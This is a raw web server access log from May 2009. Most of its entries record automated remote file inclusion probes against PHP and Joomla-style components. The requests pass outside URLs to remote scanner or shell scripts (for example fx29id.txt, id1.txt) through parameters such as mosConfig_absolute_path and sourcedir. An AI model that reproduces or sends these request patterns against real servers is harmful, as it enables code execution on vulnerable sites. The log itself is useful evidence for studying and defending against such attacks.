220.181.7.97 - - [23/May/2009:03:02:29 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
66.249.72.114 - - [23/May/2009:03:02:55 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L3081C9431851A7004A6D043+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
123.125.64.38 - - [23/May/2009:03:03:15 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
216.151.134.36 - - [23/May/2009:03:03:23 -0400] "GET /logs/access_log.Q108091400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
216.151.134.36 - - [23/May/2009:03:03:23 -0400] "GET /logs/access_log.Q108112400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
91.121.137.51 - - [23/May/2009:03:03:27 -0400] "GET /logs/access_log.Q108090100/?path%5Bdocroot%5D=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
113.29.225.7 - - [23/May/2009:03:03:27 -0400] "GET /logs/access_log.Q109050900//modules/vwar/admin/admin.php?vwar_root=http://www.kirsch-immobilier.fr/photos_annonces/ventes/ukid2.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
85.246.175.115 - - [23/May/2009:03:05:01 -0400] "GET /logs/access_log.Q108121400 HTTP/1.1" 404 224 "-" "ryfunsio eccnvxarvvewlqsfqu9feyve graa9"
212.150.52.114 - - [23/May/2009:03:05:43 -0400] "GET //include/write.php?dir=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
212.150.52.114 - - [23/May/2009:03:05:43 -0400] "GET /logs/access_log.Q109051100//include/write.php?dir=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
212.150.52.114 - - [23/May/2009:03:05:43 -0400] "GET /logs//include/write.php?dir=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
212.150.52.114 - - [23/May/2009:03:05:54 -0400] "GET /logs/access_log.Q109051100//include/write.php?dir=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
212.150.52.114 - - [23/May/2009:03:05:54 -0400] "GET //include/write.php?dir=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
212.150.52.114 - - [23/May/2009:03:05:54 -0400] "GET /logs//include/write.php?dir=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
58.227.193.198 - - [23/May/2009:03:05:54 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
58.227.193.198 - - [23/May/2009:03:05:54 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
58.227.193.198 - - [23/May/2009:03:05:54 -0400] "GET /logs/access_log.Q108091400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
58.227.193.198 - - [23/May/2009:03:06:00 -0400] "GET /logs/access_log.Q108112400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
194.126.110.134 - - [23/May/2009:03:06:21 -0400] "GET /logs/access_log.Q109051000%20%20/?REX[INCLUDE_PATH]=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
194.126.110.134 - - [23/May/2009:03:06:21 -0400] "GET /logs/?REX[INCLUDE_PATH]=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 200 2490 "-" "Mozilla/5.0"
194.126.110.134 - - [23/May/2009:03:06:21 -0400] "GET /?REX[INCLUDE_PATH]=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
209.59.12.99 - - [23/May/2009:03:06:48 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
24.242.184.98 - - [23/May/2009:03:07:39 -0400] "GET /logs/access_log.Q109030200/?REX[INCLUDE_PATH]=http://www.jungle-productions.com/login/examples/safe1.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.65"
24.242.184.98 - - [23/May/2009:03:07:39 -0400] "GET /?REX[INCLUDE_PATH]=http://www.jungle-productions.com/login/examples/safe1.txt?? HTTP/1.1" 200 409 "-" "libwww-perl/5.65"
24.242.184.98 - - [23/May/2009:03:07:39 -0400] "GET /logs/?REX[INCLUDE_PATH]=http://www.jungle-productions.com/login/examples/safe1.txt?? HTTP/1.1" 200 2490 "-" "libwww-perl/5.65"
211.241.40.51 - - [23/May/2009:03:08:41 -0400] "GET /logs/error_log.Q109051400//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.79"
212.150.52.114 - - [23/May/2009:03:08:56 -0400] "GET /logs/access_log.Q109051100%20%20//include/write.php?dir=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
212.150.52.114 - - [23/May/2009:03:09:06 -0400] "GET /logs/access_log.Q109051100%20%20//include/write.php?dir=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
91.206.183.148 - - [23/May/2009:03:09:26 -0400] "GET /logs/access_log.Q108091400//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
91.206.183.148 - - [23/May/2009:03:09:26 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
91.206.183.148 - - [23/May/2009:03:09:26 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
194.126.110.134 - - [23/May/2009:03:11:21 -0400] "GET /logs/access_log.Q109051000/?REX[INCLUDE_PATH]=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
209.59.12.99 - - [23/May/2009:03:11:48 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
91.206.183.148 - - [23/May/2009:03:11:52 -0400] "GET /logs/access_log.Q108091400%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
24.242.184.98 - - [23/May/2009:03:11:56 -0400] "GET /logs/access_log.Q109051000/?REX[INCLUDE_PATH]=http://www.jungle-productions.com/login/examples/safe1.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.65"
91.206.183.148 - - [23/May/2009:03:12:55 -0400] "GET /logs/access_log.Q109050900%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
218.246.20.221 - - [23/May/2009:03:13:02 -0400] "GET /logs/access_log.Q109051100//com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://indoirc.go.ro/idB.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.79"
218.246.20.221 - - [23/May/2009:03:13:03 -0400] "GET //com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://indoirc.go.ro/idB.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
218.246.20.221 - - [23/May/2009:03:13:03 -0400] "GET /logs//com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://indoirc.go.ro/idB.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
91.121.137.51 - - [23/May/2009:03:13:37 -0400] "GET /logs/access_log.Q108090100//include.php?path[docroot]=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
87.230.85.142 - - [23/May/2009:03:13:41 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
87.230.85.142 - - [23/May/2009:03:13:41 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
87.230.85.142 - - [23/May/2009:03:13:41 -0400] "GET /logs/access_log.Q109010700//components/com_simpleboard/image_upload.php?sbp=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
87.230.85.142 - - [23/May/2009:03:13:51 -0400] "GET /logs/access_log.Q108112300//components/com_simpleboard/image_upload.php?sbp=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
61.81.17.221 - - [23/May/2009:03:14:05 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
61.81.17.221 - - [23/May/2009:03:14:05 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
61.81.17.221 - - [23/May/2009:03:14:05 -0400] "GET /logs/access_log.Q108062400/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:03:14:25 -0400] "GET /?sourcedir=http://aene.de/eMCe/1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:03:14:25 -0400] "GET /logs/access_log.Q108111500/?sourcedir=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:03:14:25 -0400] "GET /logs/?sourcedir=http://aene.de/eMCe/1.txt?? HTTP/1.1" 200 2490 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:03:14:27 -0400] "GET /?sourcedir=http://aene.de/eMCe/1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:03:14:27 -0400] "GET /logs/access_log.Q108111500/?sourcedir=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:03:14:27 -0400] "GET /logs/?sourcedir=http://aene.de/eMCe/1.txt?? HTTP/1.1" 200 2490 "-" "Mozilla/5.0"
61.81.17.221 - - [23/May/2009:03:14:55 -0400] "GET /logs/access_log.Q108051700/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
87.230.85.142 - - [23/May/2009:03:15:31 -0400] "GET /logs/access_log.Q109010700%20%20//components/com_simpleboard/image_upload.php?sbp=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
87.230.85.142 - - [23/May/2009:03:15:31 -0400] "GET /logs/access_log.Q108112300%20%20//components/com_simpleboard/image_upload.php?sbp=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
200.142.148.142 - - [23/May/2009:03:15:41 -0400] "GET //components/com_forum/download.php?phpbb_root_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
200.142.148.142 - - [23/May/2009:03:15:41 -0400] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
123.125.64.49 - - [23/May/2009:03:16:04 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.64.51 - - [23/May/2009:03:16:10 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
72.30.142.171 - - [23/May/2009:03:16:12 -0400] "GET /logs/access_log.Q107060300 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [23/May/2009:03:16:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.17.99.13 - - [23/May/2009:03:17:31 -0400] "GET /logs/access_log.Q109010700//components/com_simpleboard/image_upload.php?sbp=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
216.17.99.13 - - [23/May/2009:03:17:31 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
216.17.99.13 - - [23/May/2009:03:17:31 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
216.17.99.13 - - [23/May/2009:03:17:39 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
216.17.99.13 - - [23/May/2009:03:17:42 -0400] "GET /logs/access_log.Q109010700//components/com_simpleboard/image_upload.php?sbp=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
216.17.99.13 - - [23/May/2009:03:17:44 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
216.17.99.13 - - [23/May/2009:03:18:21 -0400] "GET /logs/access_log.Q109010700//components/com_simpleboard/image_upload.php?sbp=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
216.17.99.13 - - [23/May/2009:03:18:21 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
216.17.99.13 - - [23/May/2009:03:18:21 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
216.17.99.13 - - [23/May/2009:03:18:31 -0400] "GET /logs/access_log.Q108112300//components/com_simpleboard/image_upload.php?sbp=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
216.17.99.13 - - [23/May/2009:03:18:33 -0400] "GET /logs/access_log.Q108112300//components/com_simpleboard/image_upload.php?sbp=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
216.17.99.13 - - [23/May/2009:03:18:40 -0400] "GET /logs/access_log.Q108112300//components/com_simpleboard/image_upload.php?sbp=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
216.17.99.13 - - [23/May/2009:03:18:44 -0400] "GET /logs/access_log.Q108112300//components/com_simpleboard/image_upload.php?sbp=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
200.142.148.142 - - [23/May/2009:03:19:01 -0400] "GET /logs/access_log.Q109010700%20%20//components/com_forum/download.php?phpbb_root_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
67.212.165.114 - - [23/May/2009:03:19:16 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
67.212.165.114 - - [23/May/2009:03:19:16 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
67.212.165.114 - - [23/May/2009:03:19:16 -0400] "GET /logs/access_log.Q109010700%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
91.149.157.130 - - [23/May/2009:03:20:12 -0400] "GET /logs/access_log.Q108090100//include.php?path[docroot]=http://www.maierarchitekten.de/manager/processors/help.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
87.230.85.142 - - [23/May/2009:03:20:52 -0400] "GET /logs/access_log.Q109050700//components/com_simpleboard/image_upload.php?sbp=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
194.30.181.170 - - [23/May/2009:03:20:59 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"
72.30.142.171 - - [23/May/2009:03:21:27 -0400] "GET /logs/access_log.Q108100600 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [23/May/2009:03:21:48 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.17.99.13 - - [23/May/2009:03:22:09 -0400] "GET /logs/access_log.Q109050700//components/com_simpleboard/image_upload.php?sbp=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
216.17.99.13 - - [23/May/2009:03:22:13 -0400] "GET /logs/access_log.Q109010700%20%20//components/com_simpleboard/image_upload.php?sbp=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
216.17.99.13 - - [23/May/2009:03:22:14 -0400] "GET /logs/access_log.Q109010700%20%20//components/com_simpleboard/image_upload.php?sbp=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
216.17.99.13 - - [23/May/2009:03:22:24 -0400] "GET /logs/access_log.Q108112300%20%20//components/com_simpleboard/image_upload.php?sbp=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
216.17.99.13 - - [23/May/2009:03:22:26 -0400] "GET /logs/access_log.Q108112300%20%20//components/com_simpleboard/image_upload.php?sbp=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
220.245.81.22 - - [23/May/2009:03:22:42 -0400] "GET /logs/error_log.Q108101300//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.graal-plus.zp.ua//images/r.jpg?? HTTP/1.1" 404 268 "-" "libwww-perl/5.805"
216.17.99.13 - - [23/May/2009:03:22:43 -0400] "GET /logs/access_log.Q109010700%20%20//components/com_simpleboard/image_upload.php?sbp=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
220.245.81.22 - - [23/May/2009:03:22:50 -0400] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.graal-plus.zp.ua//images/r.jpg?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
216.17.99.13 - - [23/May/2009:03:22:51 -0400] "GET /logs/access_log.Q108112300%20%20//components/com_simpleboard/image_upload.php?sbp=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
220.245.81.22 - - [23/May/2009:03:22:52 -0400] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.graal-plus.zp.ua//images/r.jpg?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
216.17.99.13 - - [23/May/2009:03:23:11 -0400] "GET /logs/access_log.Q109010700%20%20//components/com_simpleboard/image_upload.php?sbp=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
216.17.99.13 - - [23/May/2009:03:23:17 -0400] "GET /logs/access_log.Q108112300%20%20//components/com_simpleboard/image_upload.php?sbp=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
124.217.216.86 - - [23/May/2009:03:23:30 -0400] "GET /include/print_category.php?setup[use_category]=1&dir=http://chr.es.kr/02.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.826"
124.217.216.86 - - [23/May/2009:03:23:32 -0400] "GET /logs/error_log.Q108122200/include/print_category.php?setup[use_category]=1&dir=http://chr.es.kr/02.txt?? HTTP/1.1" 404 250 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
124.217.216.86 - - [23/May/2009:03:23:33 -0400] "GET /include/print_category.php?setup[use_category]=1&dir=http://chr.es.kr/02.txt?? HTTP/1.1" 404 224 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
124.217.216.86 - - [23/May/2009:03:24:11 -0400] "GET /logs/error_log.Q108122200/include/print_category.php?setup[use_category]=1&dir=http://chr.es.kr/02.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.826"
124.217.216.86 - - [23/May/2009:03:24:12 -0400] "GET /include/print_category.php?setup[use_category]=1&dir=http://chr.es.kr/02.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.826"
124.217.216.86 - - [23/May/2009:03:24:12 -0400] "GET /logs/include/print_category.php?setup[use_category]=1&dir=http://chr.es.kr/02.txt?? HTTP/1.1" 404 229 "-" "libwww-perl/5.826"
89.108.64.88 - - [23/May/2009:03:26:44 -0400] "GET /index.php?option=com_custompages&cpage=http://www.tmt.org.ru/readme.txt? HTTP/1.1" 404 207 "-" "libwww-perl/5.812"
209.59.12.99 - - [23/May/2009:03:26:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
58.27.163.244 - - [23/May/2009:03:29:23 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
58.27.163.244 - - [23/May/2009:03:29:23 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
58.27.163.244 - - [23/May/2009:03:29:41 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
58.27.163.244 - - [23/May/2009:03:29:41 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
91.121.210.42 - - [23/May/2009:03:31:34 -0400] "GET /?sourcedir=http://billardshow.de/images/id.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
91.121.210.42 - - [23/May/2009:03:31:34 -0400] "GET /logs/access_log.Q108111500/?sourcedir=http://billardshow.de/images/id.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
91.121.210.42 - - [23/May/2009:03:31:34 -0400] "GET /logs/?sourcedir=http://billardshow.de/images/id.txt??? HTTP/1.1" 200 2490 "-" "Mozilla/5.0"
91.121.210.42 - - [23/May/2009:03:31:41 -0400] "GET /?sourcedir=http://billardshow.de/images/id.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
91.121.210.42 - - [23/May/2009:03:31:41 -0400] "GET /logs/access_log.Q108111500%20%20/?sourcedir=http://billardshow.de/images/id.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
91.121.210.42 - - [23/May/2009:03:31:41 -0400] "GET /logs/?sourcedir=http://billardshow.de/images/id.txt??? HTTP/1.1" 200 2490 "-" "Mozilla/5.0"
91.121.210.42 - - [23/May/2009:03:31:42 -0400] "GET /logs/access_log.Q108091100/?sourcedir=http://billardshow.de/images/id.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:03:31:44 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:03:31:44 -0400] "GET /logs/access_log.Q109042200%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:03:31:45 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
91.121.210.42 - - [23/May/2009:03:31:50 -0400] "GET /logs/access_log.Q108091100%20%20/?sourcedir=http://billardshow.de/images/id.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:03:31:55 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:03:31:55 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:03:31:55 -0400] "GET /logs/access_log.Q109042200%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:03:32:08 -0400] "GET /logs/access_log.Q108091100%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
209.59.12.99 - - [23/May/2009:03:32:15 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
65.23.158.226 - - [23/May/2009:03:32:17 -0400] "GET /logs/access_log.Q108091100%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
72.30.142.171 - - [23/May/2009:03:32:20 -0400] "GET /logs/error_log.Q108011800 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
200.32.100.130 - - [23/May/2009:03:32:47 -0400] "GET //modules/mod_mainmenu.php?mosConfig_absolute_path=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
200.32.100.130 - - [23/May/2009:03:32:47 -0400] "GET /logs/access_log.Q109010700//modules/mod_mainmenu.php?mosConfig_absolute_path=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
200.32.100.130 - - [23/May/2009:03:32:47 -0400] "GET /logs//modules/mod_mainmenu.php?mosConfig_absolute_path=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
89.108.64.88 - - [23/May/2009:03:33:26 -0400] "GET /logs/access_log.Q108111500/index.php?option=com_custompages&cpage=http://www.tmt.org.ru/readme.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.812"
89.108.64.88 - - [23/May/2009:03:33:26 -0400] "GET /logs/index.php?option=com_custompages&cpage=http://www.tmt.org.ru/readme.txt? HTTP/1.1" 404 212 "-" "libwww-perl/5.812"
89.108.64.88 - - [23/May/2009:03:33:28 -0400] "GET /logs/access_log.Q108090100/index.php?option=com_custompages&cpage=http://www.tmt.org.ru/readme.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.812"
64.34.181.87 - - [23/May/2009:03:33:38 -0400] "GET /logs/access_log.Q108090100//include.php?path[docroot]=http://www.maierarchitekten.de/manager/processors/help.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.803"
91.121.210.42 - - [23/May/2009:03:33:41 -0400] "GET /?sourcedir=http://billardshow.de/images/id.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
91.121.210.42 - - [23/May/2009:03:33:41 -0400] "GET /logs/access_log.Q108111500/?sourcedir=http://billardshow.de/images/id.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
